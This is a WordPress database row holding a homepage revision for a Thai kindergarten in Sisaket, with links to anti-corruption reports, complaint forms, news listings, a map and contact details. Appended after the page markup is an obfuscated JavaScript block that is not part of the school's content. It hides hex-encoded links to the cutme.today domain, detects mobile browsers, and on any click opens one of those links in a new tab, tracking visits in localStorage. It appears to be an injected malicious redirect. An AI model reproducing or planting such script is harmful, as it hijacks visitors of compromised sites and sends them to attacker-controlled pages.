900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:13:02','2024-08-30 03:13:02','',19,'http://watprato.ssk.in.th/?p=298',0,'revision','',0),
